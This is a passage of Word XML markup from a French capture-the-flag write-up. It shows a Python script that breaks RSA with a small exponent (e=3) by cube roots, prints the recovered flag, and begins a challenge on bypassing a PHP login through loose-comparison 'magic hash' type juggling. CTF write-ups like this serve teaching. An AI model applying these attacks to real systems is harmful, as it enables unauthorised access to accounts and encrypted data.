              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>0x3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>msg_str</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'D+69fRHNs+jIsfYM+tkQ5pkp232NfGz52/3wcwesEGsfB39VdQiS8nRdYX0anRcnEnaBTUaXO99ICqHZYl1aUamf3cpFSLBgvdewXTFl'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>decode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'base64'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>orig</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>msg_str</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>encode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'hex'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>orig</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>while</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>True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m</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>gmpy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>0</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C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>pow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>m</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>orig</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print</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"Message</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,(</w:t>
            </w:r>
            <w:r>
              <w:t>hex</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>m</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>:].</w:t>
            </w:r>
            <w:r>
              <w:t>rstrip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>"L"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)).</w:t>
            </w:r>
            <w:r>
              <w:t>decode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'hex'</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break</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>+=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>N</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:highlight w:val="white"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Le flag apparait dans la console : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ese{w3ak_3xponent_1s_C00l}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="2520" w:right="1512" w:bottom="1800" w:left="1512" w:header="1080" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:cols w:space="720" w:num="1"/>
          <w:docGrid w:linePitch="360" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc1055286697"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="577188"/>
        </w:rPr>
        <w:t>CRYPTO 250 - Magic Crypto Language</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
          <w:color w:val="8000FF"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Le challenge tire parti du PHP Juggling Type et des Magic Hashes de PHP, c’est une authentification basique que nous devons contourner pour accéder au flag.</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rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'user'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>isset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'pass'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>])){</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>3514090</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>67310</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2028825" cy="1884045"/>
                  <wp:effectExtent l="0" t="0" r="0" b="190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a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId12"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2028825" cy="1884045"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>$hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'ripemd160'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'pass'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>]);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>$hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>substr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000080"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>$hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>$_POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="008000"/>
              </w:rPr>
              <w:t>'user'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="808000"/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>$hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$secret_token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echo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>$secret_msg</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000000"/>
              </w:rPr>
              <w:t>die();</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="35"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:widowControl/>
              <w:suppressLineNumbers w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="C0C0C0"/>
              </w:rPr>
              <w:tab/>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rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
                <w:color w:val="8000FF"/>
                <w:sz w:val="20"/>
                <w:highlight w:val="white"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
          <w:color w:val="8000FF"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
